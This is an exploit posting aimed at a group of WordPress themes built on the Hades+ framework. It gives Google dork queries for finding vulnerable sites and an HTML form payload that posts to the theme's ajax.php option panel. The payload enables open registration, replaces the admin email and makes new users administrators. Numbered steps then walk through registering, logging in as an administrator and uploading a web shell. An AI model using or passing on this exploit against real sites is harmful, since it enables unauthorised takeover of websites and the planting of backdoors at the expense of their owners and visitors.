Exploit Title:Hades+ Framework Add Administrator
Google multiple Dork:
inurl:/wp-content/themes/appius/
inurl:/wp-content/themes/Consultant/
inurl:/wp-content/themes/appius1/
inurl:/wp-content/themes/archin/
inurl:/wp-content/themes/averin/
inurl:/wp-content/themes/dagda/
inurl:/wp-content/themes/echea/
inurl:/wp-content/themes/felici/
inurl:/wp-content/themes/kmp/
inurl:/wp-content/themes/kmp2/
inurl:/wp-content/themes/liberal/
inurl:/wp-content/themes/liberal-media-bias/
inurl:/wp-content/themes/linguini/
inurl:/wp-content/themes/livewire/
inurl:/wp-content/themes/majestics/
inurl:/wp-content/themes/mathis/
inurl:/wp-content/themes/mazine/
inurl:/wp-content/themes/Orchestra/
inurl:/wp-content/themes/shopsum/
inurl:/wp-content/themes/shotzz/
inurl:/wp-content/themes/test/
inurl:/wp-content/themes/Viteeo/
inurl:/wp-content/themes/vithy/
inurl:/wp-content/themes/yvora/
inurl:/wp-content/themes/sodales/

Exploit:
 <form action="http://www.yourtarget.com/wp-content/themes/[themename,i mean:/appius//Consultant//archin/etc etc]/hades_framework/option_panel/ajax.php" method="POST">
<input name="values[0][name]" value="users_can_register">
<input name="values[0][value]" value="1">
<input name="values[1][name]" value="admin_email">
<input name="values[1][value]" value="{%YOUR_EMAIL}">
<input name="values[2][name]" value="default_role">
<input name="values[2][value]" value="administrator">
<input name="action" value="save">
<input type="submit" value="Submit">
</form>

Process==>
1.Change [themename,i mean:/appius//Consultant//archin/etc etc]vulnerable theme, [YOUR_EMAIL] with your email address.
sample==>http://www.yourtarget.com/wp-content/themes/[replace the vulnerable themename with yourmailaddress]/hades_framework/option_panel/ajax.php

2. go to http://www.yourtarget.com/wp-login.php?action=register,  [you will see the registration form].

3. choose your username & email address and register.
4. go to your email, you will find your password.
5. then login & and upload your shell